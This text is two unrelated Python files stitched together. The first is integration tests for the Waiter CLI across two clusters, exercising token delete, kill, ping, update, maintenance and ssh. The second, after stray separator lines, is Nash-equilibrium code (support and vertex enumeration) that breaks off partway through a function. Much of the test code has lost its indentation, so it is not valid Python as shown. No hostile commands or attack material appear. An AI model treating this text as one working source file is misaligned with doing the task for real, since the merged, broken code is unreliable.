util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
# Create in cluster #2
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Delete the token in one cluster only
cp = cli.delete(token_name=token_name, flags=f'--config {path} --cluster waiter2')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertNotIn('exists in 2 clusters', cli.stdout(cp))
self.assertNotIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count('Deleting token'))
self.assertEqual(1, cli.stdout(cp).count('Successfully deleted'))
util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True)
def test_delete_token_in_multiple_cluster_groups(self):
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# failed delete because the target cluster couldn't be inferred when the token is in mutliple cluster groups
cp = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Could not infer the target cluster for this operation', cli.stderr(cp))
self.assertIn('waiter1', cli.stderr(cp))
self.assertIn('waiter2', cli.stderr(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=True)
def test_delete_token_in_single_cluster_group(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'production'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'cluster': 'waiter1', 'version': version_1}, update_mode_admin=True)
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'cluster': 'waiter1', 'version': version_2}, update_mode_admin=True)
try:
with cli.temp_config_file(config) as path:
# deletes token in the primary cluster only, and relies on token syncer that will sync the delete
cp = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Successfully deleted {token_name} in waiter1.', cli.stdout(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
# attempting to delete again yields a no-op as the token is effectively deleted in the cluster group
cp_noop = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(1, cp_noop.returncode, cp_noop.stderr)
self.assertIn('No matching data found in', cli.stdout(cp_noop))
self.assertIn('waiter1', cli.stdout(cp_noop))
self.assertIn('waiter2', cli.stdout(cp_noop))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=True)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_delete_token_in_single_cluster_group_force(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'production'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'production'}]}
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2})
try:
with cli.temp_config_file(config) as path:
# deletes token in the primary cluster with force will delete the token in all clusters, not just primary cluster
cp = cli.delete(token_name=token_name, flags=f'--config {path}', delete_flags='-f')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Successfully deleted {token_name} in waiter1.', cli.stdout(cp))
self.assertIn(f'Successfully deleted {token_name} in waiter2.', cli.stdout(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
# attempting to delete again yields a no-op as the token should be completely deleted
cp_noop = cli.delete(token_name=token_name, flags=f'--config {path}')
self.assertEqual(1, cp_noop.returncode, cp_noop.stderr)
self.assertIn('No matching data found in', cli.stdout(cp_noop))
self.assertIn('waiter1', cli.stdout(cp_noop))
self.assertIn('waiter2', cli.stdout(cp_noop))
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_delete_token_sync_disabled(self):
token_name = self.token_name()
version_1 = str(uuid.uuid4())
util.post_token(self.waiter_url_1, token_name, {'version': version_1})
try:
version_2 = str(uuid.uuid4())
util.post_token(self.waiter_url_2, token_name, {'version': version_2,
'metadata': {'waiter-token-sync-opt-out': 'true'}})
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Delete the token in both clusters
cp = cli.delete(token_name=token_name, flags=f'--config {path}', stdin='Yes\nYes\n'.encode('utf8'))
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Successfully deleted {token_name} in waiter1.', cli.stdout(cp))
self.assertIn(f'Successfully deleted {token_name} in waiter2.', cli.stdout(cp))
util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
util.load_token(self.waiter_url_2, token_name, expected_status_code=404)
finally:
util.delete_token(self.waiter_url_2, token_name, assert_response=False)
finally:
util.delete_token(self.waiter_url_1, token_name, assert_response=False)
def test_federated_ping(self):
# Create in cluster #1
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description())
try:
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description())
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Ping the token in both clusters
cp = cli.ping(token_name_or_service_id=token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Pinging token'))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_1, token_name)))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_2, token_name)))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_federated_kill(self):
# Create in cluster #1
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description())
try:
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description())
try:
# Ping the token in both clusters
util.ping_token(self.waiter_url_1, token_name)
util.ping_token(self.waiter_url_2, token_name)
# Kill the services in both clusters
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
cp = cli.kill(token_name_or_service_id=token_name, flags=f'--config {path}', kill_flags='--force')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(2, cli.stdout(cp).count('Killing service'))
self.assertEqual(2, cli.stdout(cp).count('Successfully killed'))
self.assertEqual(0, len(util.services_for_token(self.waiter_url_1, token_name)))
self.assertEqual(0, len(util.services_for_token(self.waiter_url_2, token_name)))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
    def test_federated_kill_service_id(self):
        """Kill by --service-id across clusters when the service is already inactive.

        Both clusters run the same service id (identical descriptions), the
        services are killed out-of-band, and the CLI's kill is then expected to
        report 'already Inactive' for each cluster — with and without --force.
        """
        # Create in cluster #1
        token_name = self.token_name()
        service_description = util.minimal_service_description()
        util.post_token(self.waiter_url_1, token_name, service_description)
        try:
            # Create in cluster #2
            util.post_token(self.waiter_url_2, token_name, service_description)
            try:
                # Ping the token in both clusters
                service_id_1 = util.ping_token(self.waiter_url_1, token_name)
                service_id_2 = util.ping_token(self.waiter_url_2, token_name)
                # identical service descriptions should yield the same service id
                self.assertEqual(service_id_1, service_id_2)
                # Kill the services in both clusters
                util.kill_services_using_token(self.waiter_url_1, token_name)
                util.kill_services_using_token(self.waiter_url_2, token_name)
                # Attempt to kill using the CLI
                config = self.__two_cluster_config()
                with cli.temp_config_file(config) as path:
                    # First with --force
                    cp = cli.kill(token_name_or_service_id=service_id_1, flags=f'--config {path}',
                                  kill_flags='--force --service-id')
                    self.assertEqual(0, cp.returncode, cp.stderr)
                    self.assertIn('waiter1', cli.stdout(cp))
                    self.assertIn('waiter2', cli.stdout(cp))
                    # both clusters report the service as already Inactive
                    self.assertEqual(2, cli.stdout(cp).count('cannot be killed because it is already Inactive'))
                    # Then, without --force
                    cp = cli.kill(token_name_or_service_id=service_id_1, flags=f'--config {path}',
                                  kill_flags='--service-id')
                    self.assertEqual(0, cp.returncode, cp.stderr)
                    # per-cluster details are printed for the same service id
                    self.assertIn(f'waiter1 / {service_id_1}', cli.stdout(cp))
                    self.assertIn(f'waiter2 / {service_id_2}', cli.stdout(cp))
                    self.assertIn(f'{self.waiter_url_1}/apps/{service_id_1}', cli.stdout(cp))
                    self.assertIn(f'{self.waiter_url_2}/apps/{service_id_2}', cli.stdout(cp))
                    self.assertEqual(2, cli.stdout(cp).count('cannot be killed because it is already Inactive'))
                    self.assertEqual(2, cli.stdout(cp).count('Run as user'))
            finally:
                util.delete_token(self.waiter_url_2, token_name, kill_services=True)
        finally:
            util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_update_non_default_cluster(self):
# Set up the config so that cluster #1 is the default
config = {'clusters': [{'name': 'waiter1', 'url': self.waiter_url_1, 'default-for-create': True},
{'name': 'waiter2', 'url': self.waiter_url_2}]}
# Create in cluster #2 (the non-default)
token_name = self.token_name()
service_description = util.minimal_service_description()
util.post_token(self.waiter_url_2, token_name, service_description)
try:
# Update using the CLI, which should update in cluster #2
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertNotIn('waiter1', cli.stdout(cp))
self.assertIn('waiter2', cli.stdout(cp))
token_1 = util.load_token(self.waiter_url_1, token_name, expected_status_code=404)
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertNotIn('version', token_1)
self.assertEqual(version, token_2['version'])
finally:
util.delete_token(self.waiter_url_2, token_name)
def _test_choose_latest_configured_cluster(self, cluster_test_configs, expected_updated_cluster_index):
config = {'clusters': cluster_test_configs}
token_name = self.token_name()
expected_cluster_with_latest_token = cluster_test_configs[expected_updated_cluster_index]
# last token defined in the cluster_test_configs array will be the latest token
for cluster_test_config in cluster_test_configs:
util.post_token(cluster_test_config['url'], token_name, cluster_test_config['token-to-create'],
update_mode_admin=True)
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(expected_cluster_with_latest_token['name'], cli.stdout(cp))
modified_token = util.load_token(expected_cluster_with_latest_token['url'], token_name,
expected_status_code=200)
self.assertEqual(version, modified_token['version'])
for cluster_test_config in cluster_test_configs:
waiter_url = cluster_test_config['url']
if waiter_url != expected_cluster_with_latest_token['url']:
not_modified_token = util.load_token(waiter_url, token_name, expected_status_code=200)
self.assertNotEqual(version, not_modified_token)
self.assertNotIn(cluster_test_config['name'], cli.stdout(cp))
finally:
for cluster_test_config in cluster_test_configs:
util.delete_token(cluster_test_config['url'], token_name)
def test_update_token_latest_configured_same_cluster(self):
sync_group_name = 'group_name'
cluster_test_configs = [{'name': 'waiter1',
'url': self.waiter_url_1,
'token-to-create': util.minimal_service_description(cluster=self.waiter_1_cluster),
'default-for-create': True,
'sync-group': sync_group_name},
{'name': 'waiter2',
'url': self.waiter_url_2,
'token-to-create': util.minimal_service_description(cluster=self.waiter_2_cluster),
'sync-group': sync_group_name}]
self._test_choose_latest_configured_cluster(cluster_test_configs, 1)
def test_update_token_latest_configured_different_cluster(self):
sync_group_name = 'group_name'
cluster_test_configs = [{'name': 'waiter1',
'url': self.waiter_url_1,
'token-to-create': util.minimal_service_description(cluster=self.waiter_1_cluster),
'default-for-create': True,
'sync-group': sync_group_name},
{'name': 'waiter2',
'url': self.waiter_url_2,
'token-to-create': util.minimal_service_description(cluster=self.waiter_1_cluster),
'sync-group': sync_group_name}]
self._test_choose_latest_configured_cluster(cluster_test_configs, 0)
def test_update_token_latest_configured_to_missing_cluster(self):
sync_group_1 = "sync-group-1"
unlisted_cluster_name = "unlisted_cluster"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': sync_group_1},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': sync_group_1}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description(cluster=self.waiter_1_cluster))
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=unlisted_cluster_name))
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('The token is configured in cluster', cli.stderr(cp))
self.assertIn(unlisted_cluster_name, cli.stderr(cp))
self.assertIn(self.waiter_1_cluster, cli.stderr(cp))
self.assertIn(self.waiter_2_cluster, cli.stderr(cp))
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def _test_update_token_multiple_sync_groups(self, config):
token_name = self.token_name()
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter2', cli.stdout(cp))
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertEqual(version, token_2['version'])
finally:
util.delete_token(self.waiter_url_2, token_name)
def test_update_token_multiple_sync_groups_no_conflict(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': "sync-group-1"},
{'name': 'waiter2', 'url': self.waiter_url_2,
'sync-group': "sync-group-2"}]}
self._test_update_token_multiple_sync_groups(config)
def test_update_token_multiple_sync_groups_not_listed(self):
# by default, if no sync group is listed the sync-group is given a unique group
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True},
{'name': 'waiter2', 'url': self.waiter_url_2}]}
self._test_update_token_multiple_sync_groups(config)
def test_update_token_multiple_sync_groups_with_conflict(self):
sync_group_1 = "sync-group-1"
sync_group_2 = "sync-group-2"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': sync_group_1},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': sync_group_2}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description(cluster=self.waiter_1_cluster))
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
version = str(uuid.uuid4())
cp = cli.update(token_name=token_name, flags=f'--config {path}', update_flags=f'--version {version}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Could not infer the target cluster', cli.stderr(cp))
self.assertIn(sync_group_1, cli.stderr(cp))
self.assertIn(sync_group_2, cli.stderr(cp))
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_maintenance_start_latest_configured_cluster(self):
custom_maintenance_message = "custom maintenance message"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'group_name'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'group_name'}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description(cluster=self.waiter_1_cluster))
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
cp = cli.maintenance('start', token_name, flags=f'--config {path}',
maintenance_flags=f'"{custom_maintenance_message}"')
self.assertEqual(0, cp.returncode, cp.stderr)
token_1 = util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertEqual(custom_maintenance_message, token_2['maintenance']['message'])
self.assertTrue('maintenance' not in token_1)
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_maintenance_stop_latest_configured_cluster(self):
custom_maintenance_message = "custom maintenance message"
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'group_name'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'group_name'}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1,
token_name,
util.minimal_service_description(cluster=self.waiter_1_cluster,
maintenance={'message': custom_maintenance_message}))
util.post_token(self.waiter_url_2,
token_name,
util.minimal_service_description(cluster=self.waiter_2_cluster,
maintenance={'message': custom_maintenance_message}))
try:
with cli.temp_config_file(config) as path:
cp = cli.maintenance('stop', token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_1 = util.load_token(self.waiter_url_1, token_name, expected_status_code=200)
token_2 = util.load_token(self.waiter_url_2, token_name, expected_status_code=200)
self.assertTrue('maintenance' not in token_2)
self.assertTrue(custom_maintenance_message, token_1['maintenance']['message'])
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_maintenance_check_latest_configured_cluster(self):
config = {'clusters': [{'name': 'waiter1',
'url': self.waiter_url_1,
'default-for-create': True,
'sync-group': 'group_name'},
{'name': 'waiter2',
'url': self.waiter_url_2,
'sync-group': 'group_name'}]}
token_name = self.token_name()
util.post_token(self.waiter_url_1,
token_name,
util.minimal_service_description(cluster=self.waiter_1_cluster,
maintenance={'message': "custom maintenance message"}))
util.post_token(self.waiter_url_2,
token_name,
util.minimal_service_description(cluster=self.waiter_2_cluster))
try:
with cli.temp_config_file(config) as path:
cp = cli.maintenance('check', token_name, flags=f'--config {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'{token_name} is not in maintenance mode', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url_1, token_name)
util.delete_token(self.waiter_url_2, token_name)
def test_ping_via_token_cluster(self):
# Create in cluster #1
token_name = self.token_name()
token_data = util.minimal_service_description()
util.post_token(self.waiter_url_1, token_name, token_data)
try:
# Create in cluster #2
token_data['cluster'] = util.load_token(self.waiter_url_1, token_name)['cluster']
util.post_token(self.waiter_url_2, token_name, token_data)
try:
config = self.__two_cluster_config()
with cli.temp_config_file(config) as path:
# Ping the token, which should only ping in cluster #1
cp = cli.ping(token_name_or_service_id=token_name, flags=f'--config {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter1', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count('Pinging token'))
self.assertEqual(1, cli.stdout(cp).count('Not pinging token'))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_1, token_name)))
self.assertEqual(0, len(util.services_for_token(self.waiter_url_2, token_name)))
# Ping the token in cluster #2 explicitly
cp = cli.ping(token_name_or_service_id=token_name, flags=f'--config {path} --cluster waiter2')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('waiter2', cli.stdout(cp))
self.assertEqual(1, cli.stdout(cp).count('Pinging token'))
self.assertEqual(0, cli.stdout(cp).count('Not pinging token'))
self.assertEqual(1, len(util.services_for_token(self.waiter_url_2, token_name)))
finally:
util.delete_token(self.waiter_url_2, token_name, kill_services=True)
finally:
util.delete_token(self.waiter_url_1, token_name, kill_services=True)
def test_federated_tokens(self):
# Create in cluster #1
token_name = self.token_name()
util.post_token(self.waiter_url_1, token_name, util.minimal_service_description())
try:
# Single query for the tokens, federated across clusters
cluster_1 = f'foo_{uuid.uuid4()}'
cluster_2 = f'bar_{uuid.uuid4()}'
config = {'clusters': [{'name': cluster_1, 'url': self.waiter_url_1},
{'name': cluster_2, 'url': self.waiter_url_2}]}
with cli.temp_config_file(config) as path:
cp, tokens = cli.tokens_data(flags='--config %s' % path)
tokens = [t for t in tokens if t['token'] == token_name]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(1, len(tokens), tokens)
# Create in cluster #2
util.post_token(self.waiter_url_2, token_name, util.minimal_service_description())
try:
# Again, single query for the tokens, federated across clusters
cp, tokens = cli.tokens_data(flags='--config %s' % path)
tokens = [t for t in tokens if t['token'] == token_name]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(tokens), tokens)
# Test the secondary sort on cluster
cp = cli.tokens(flags='--config %s' % path)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(cluster_1, stdout)
self.assertIn(cluster_2, stdout)
self.assertLess(stdout.index(cluster_2), stdout.index(cluster_1))
finally:
util.delete_token(self.waiter_url_2, token_name)
finally:
util.delete_token(self.waiter_url_1, token_name)
    def __test_ssh_same_service_id_on_multiple_clusters(self, create_empty_service=True):
        """Exercise `ssh` when the same service id exists on both clusters.

        :param create_empty_service: if True, cluster #1 gets a service with no
            active instances (only cluster #2 is pinged); if False, both clusters
            are pinged so both have active instances
        """
        token_name = self.token_name()
        service_desc = util.minimal_service_description()
        util.post_token(self.waiter_url_1, token_name, service_desc)
        util.post_token(self.waiter_url_2, token_name, service_desc)
        try:
            # service ids should be the same as their service descriptions are the same
            service1_id = util.create_empty_service_with_token(self.waiter_url_1, token_name) if create_empty_service \
                else util.ping_token(self.waiter_url_1, token_name)
            service2_id = util.ping_token(self.waiter_url_2, token_name)
            self.assertEqual(service1_id, service2_id)
            instances1 = [] if create_empty_service else \
                util.instances_for_service(self.waiter_url_1, service1_id)['active-instances']
            instances2 = util.instances_for_service(self.waiter_url_2, service2_id)['active-instances']
            possible_instances = instances1 + instances2
            # replace the ssh/kubectl binaries with `echo` — presumably so the CLI
            # prints the command it would run instead of connecting (TODO confirm
            # these env vars are read by the CLI)
            env = os.environ.copy()
            env['WAITER_SSH'] = 'echo'
            env['WAITER_KUBECTL'] = 'echo'
            config = self.__two_cluster_config()
            with cli.temp_config_file(config) as path:
                # '1\n' on stdin answers the instance-selection prompt
                cp = cli.ssh(token_or_service_id_or_instance_id=service1_id, stdin='1\n'.encode('utf8'), ssh_flags='-s',
                             flags=f'--config {path}', env=env)
                stdout = cli.stdout(cp)
                self.assertEqual(0, cp.returncode, cp.stderr)
                # all instances should have been an option when prompting
                self.assertFalse(util.get_instances_not_in_output(possible_instances, stdout))
                # any one of the instances should have been attempted to ssh into
                ssh_instance1 = None if create_empty_service else \
                    util.get_ssh_instance_from_output(self.waiter_url_1, instances1, stdout)
                ssh_instance2 = util.get_ssh_instance_from_output(self.waiter_url_2, instances2, stdout)
                found = ssh_instance1 is not None or ssh_instance2 is not None
                self.assertTrue(found, msg=f"None of the possible instances {possible_instances} were detected in ssh "
                                           f"command output: \n{stdout}")
        finally:
            util.delete_token(self.waiter_url_1, token_name, kill_services=True)
            util.delete_token(self.waiter_url_2, token_name, kill_services=True)
def test_ssh_service_id_on_multiple_clusters_no_instances(self):
self.__test_ssh_same_service_id_on_multiple_clusters(create_empty_service=False)
def test_ssh_service_id_on_multiple_clusters_multiple_instances(self):
self.__test_ssh_same_service_id_on_multiple_clusters()
|
|
from itertools import combinations
import numpy as np
def _test(actual, expected, description=None, debug=False):
"""Compares the numerically derived list of Nash equilibria with the
expected (analytical) solution, and prints the result of the comparison
to screen.
Keyword arguments:
actual -- Numerically derived list of Nash equilibria (np.array assumed)
expected -- Expected (analytical) solution to the game
description -- (Optional) String description of the game
debug -- (Optional) True if print derived Nash equilibria to screen
"""
def _round_iterable(iterable, dec_places=5):
return map(lambda el: round(el, dec_places), iterable)
actual = set([(tuple(_round_iterable(x.flatten().tolist())), tuple(_round_iterable(y.flatten().tolist())))
for (x, y) in actual])
expected = set([(tuple(_round_iterable(x)), tuple(_round_iterable(y))) for (x, y) in expected])
result = "Test for game {}".format(description)
result += " passed." if actual == expected else " failed."
print(result)
if debug:
print("Derived MSNE for game {}:".format(description))
for ne in actual:
print("{}, {}".format(ne[0], ne[1]))
print()
def support_enumeration(payoff_matrix_p1, payoff_matrix_p2):
    r"""Implements support enumeration algorithm for computing all Nash
    equilibria of a bimatrix game specified by the input payoff matrices per
    player, and returns a list consisting of all Nash equilibria of the game.
    Each element of the returned list is a tuple of mixed strategies for both
    players, with the first element being the mixed strategy of the first
    player (each strategy is a column vector of shape (m, 1)/(n, 1)).
    Full theoretical description of the algorithm can be found in
    \"Algorithmic Game Theory\" by Nisan et al. (see Algorithm 3.4).
    IMPORTANT: The algorithm requires the game to be _nondegenerate_.
    Keyword arguments:
    payoff_matrix_p1 -- Payoff matrix of player 1 (np.array assumed)
    payoff_matrix_p2 -- Payoff matrix of player 2 (np.array assumed)
    """
    # Input params
    m, n = payoff_matrix_p1.shape
    M = range(m)
    N = range(n)
    # Output params
    msne = []
    # 1. Find set K={1,...,min{m,n}} of candidate support sizes
    K = range(1, min((m, n)) + 1)
    # 2. For each k in K,
    for k in K:
        # 3. Let M(k) and N(k) be sets of all k-sized subsets of M and N,
        # respectively. For each pair (I, J) such that I in M(k) and J in N(k),
        for (I, J) in ((I, J) for I in combinations(M, k) for J in combinations(N, k)):
            # 4. Solve for mixed strategy vectors x and y
            x = np.zeros((m, 1))
            y = np.zeros((n, 1))
            if k == 1:
                # Trivial case: pure strategies
                x[I[0]] = 1
                y[J[0]] = 1
            else:
                # Constraints for player 1: x must make player 2 indifferent
                # between the pure strategies in J, and sum to 1.
                v = [np.array([payoff_matrix_p2[i, j] for i in I]) for j in J]
                # BUGFIX: the normalization row must be 1-D (np.ones(k)).
                # The original np.ones((k, 1)) made the row list ragged, and
                # np.array raises ValueError for ragged input on modern NumPy.
                A = np.array([v[0] - v[p] for p in range(1, k)] + [np.ones(k)])
                b = np.array((k - 1) * [0] + [1])
                # Try solving matrix equation Ax = b using LU decomposition method
                try:
                    solution = np.linalg.solve(A, b)
                # -- if that fails, then x cannot form Nash equilibrium
                # (BUGFIX: np.linalg.linalg was removed in NumPy 2.0; the
                # exception lives at np.linalg.LinAlgError)
                except np.linalg.LinAlgError:
                    continue
                # Create mixed strategy vector x: scatter the support
                # solution into the full-length strategy vector
                solution.resize(m)
                indices = list(I)
                if len(indices) < m:
                    indices += [p for p in range(m) if p not in indices]
                for (i, j) in zip(indices, range(m)):
                    x[i] = solution[j]
                # For player 2 (same construction with roles swapped)
                u = [np.array([payoff_matrix_p1[i, j] for j in J]) for i in I]
                A = np.array([u[0] - u[p] for p in range(1, k)] + [np.ones(k)])
                b = np.array((k - 1) * [0] + [1])
                # Try solving matrix equation Ay = b using LU decomposition method
                try:
                    solution = np.linalg.solve(A, b)
                # -- if that fails, then y cannot form Nash equilibrium
                except np.linalg.LinAlgError:
                    continue
                # Create mixed strategy vector y
                solution.resize(n)
                indices = list(J)
                if len(indices) < n:
                    indices += [p for p in range(n) if p not in indices]
                for (i, j) in zip(indices, range(n)):
                    y[i] = solution[j]
            # Verify that (x, y) constitutes a Nash equilibrium
            # 5. Check if both x and y are nonnegative
            if all(x >= 0) and all(y >= 0):
                # 6. Check if best response condition is met
                # For x: payoffs to player 2 on the support vs. overall best
                v = [np.dot(x.flatten(), payoff_matrix_p2[:, j]) for j in J]
                maximum_x = max(np.dot(x.flatten(), payoff_matrix_p2[:, col]) for col in N)
                # For y: payoffs to player 1 on the support vs. overall best
                u = [np.dot(y.flatten(), payoff_matrix_p1[i, :]) for i in I]
                maximum_y = max(np.dot(y.flatten(), payoff_matrix_p1[row, :]) for row in M)
                # Account for numerical errors from dot product operation on floats
                if all(abs(el - maximum_x) <= .0000001 for el in v) and \
                        all(abs(el - maximum_y) <= .0000001 for el in u):
                    # If the last condition is met, add (x, y) to solution list msne
                    msne += [(x, y)]
    return msne
def vertex_enumeration(payoff_matrix_p1, payoff_matrix_p2):
    r"""Implements vertex enumeration algorithm for computing all Nash
    equilibria of a bimatrix game specified by the input payoff matrices per
    player, and returns a list consisting of all Nash equilibria of the game.
    Each element of the returned list is a tuple of mixed strategies for both
    players, with the first element being the mixed strategy of the first
    player.
    Full theoretical description of the algorithm can be found in
    \"Algorithmic Game Theory\" by Nisan et al. (see Algorithm 3.5).
    IMPORTANT: The algorithm requires the game to be _nondegenerate_, and
    payoff matrices of both players not containing a zero column.
    Keyword arguments:
    payoff_matrix_p1 -- Payoff matrix of player 1 (np.array assumed)
    payoff_matrix_p2 -- Payoff matrix of player 2 (np.array assumed)
    """
    # Input params
    m, n = payoff_matrix_p1.shape
    # Output params
    msne = []
    # 1. Preprocess by creating a nonnegative payoff matrix for either bidder.
    # BUGFIX: shift out-of-place so the caller's arrays are not mutated (the
    # original used += in place). A uniform shift of both payoff matrices
    # leaves the set of equilibria unchanged.
    minimum = min(payoff_matrix_p1.flatten().tolist() + payoff_matrix_p2.flatten().tolist())
    payoff_matrix_p1 = payoff_matrix_p1 + np.ones((m, n), dtype=int) * abs(minimum)
    payoff_matrix_p2 = payoff_matrix_p2 + np.ones((m, n), dtype=int) * abs(minimum)
    # 2. Find all vertices of player 1's polytope
    # Let P be the dictionary of all vertices, where keys are the labels
    # corresponding to that particular vertex.
